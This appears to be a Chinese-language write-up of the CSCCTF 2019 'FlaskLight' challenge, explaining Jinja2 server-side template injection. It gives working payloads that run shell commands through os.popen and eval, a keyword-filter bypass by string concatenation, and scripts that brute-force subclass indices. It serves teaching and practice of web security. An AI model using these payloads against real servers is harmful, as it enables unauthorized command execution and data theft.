[CSCCTF 2019 Qual]FlaskLight 1

目录

题目分析

看题目名称,可能是flask模板注入

查看页面源码,提示get方式传入search

text 复制代码
payload:?search={{7*7}}

返回49,确定是模板注入

模板注入相关知识

判断模板类型

继承关系


魔术方法

python 复制代码
__class__    # 查找当前类型的所属对象
__base__     # 沿着父子类的关系往上走一个
__mro__      # 查找当前对象继承的所有继承类
__subclasses__()    # 查找父类下所有的子类
__init__        # 查看类是否重载,重载指的是程序在运行时就加载好了这个模块到内存中,如果出现wrapper字眼,说明没有重载
__globals__        # 函数会以字典的形式返回当前对象的全部全局变量

常用注入模块

解法一:使用config

text 复制代码
payload:?search={{config}}

没ban环境变量,那么直接开始做题

text 复制代码
payload:?search={{config.__class__.__init__.__.globals__['os'].popen('whoami').read()}}

报错,应该是设置了过滤,经过逐个输入,确定过滤了global

过滤绕过

有许多绕过方法:

+拼接

~拼接

过滤器


寻找falg

我们使用+拼接即可绕过

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls').read()}}

看看flasklight

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}}

查看flag

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen(''cat /flasklight/coomme_geeeett_youur_flek'').read()}}

解法二:在已加载os模块的子类中直接调用os模块

python脚本查找加载os模块的子类

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'os.py' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

寻找flag的过程省略

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}

解法三:内建函数eval执行命令

python脚本寻找命令位置

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'eval' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}
相关推荐
都叫我大帅哥39 分钟前
Python的Optional:让你的代码优雅处理“空值”危机
python
曾几何时`3 小时前
基于python和neo4j构建知识图谱医药问答系统
python·知识图谱·neo4j
2301_780789663 小时前
UDP和TCP的主要区别是什么
服务器·网络协议·web安全·网络安全·udp
写写闲篇儿5 小时前
Python+MongoDB高效开发组合
linux·python·mongodb
一只栖枝6 小时前
HCIA-Security 认证精讲!网络安全理论与实战全掌握
网络·web安全·网络安全·智能路由器·hcia·it·hcia-security
杭州杭州杭州6 小时前
Python笔记
开发语言·笔记·python
路人蛃8 小时前
通过国内扣子(Coze)搭建智能体并接入discord机器人
人工智能·python·ubuntu·ai·aigc·个人开发
qiqiqi(^_×)8 小时前
卡在“pycharm正在创建帮助程序目录”
ide·python·pycharm
Ching·8 小时前
esp32使用ESP-IDF在Linux下的升级步骤,和遇到的坑Traceback (most recent call last):,及解决
linux·python·esp32·esp_idf升级
晨欣9 小时前
大型语言模型(LLM)在网络安全中最具商业价值的应用场景(Grok3 回答 DeepSearch模式)
网络·web安全·语言模型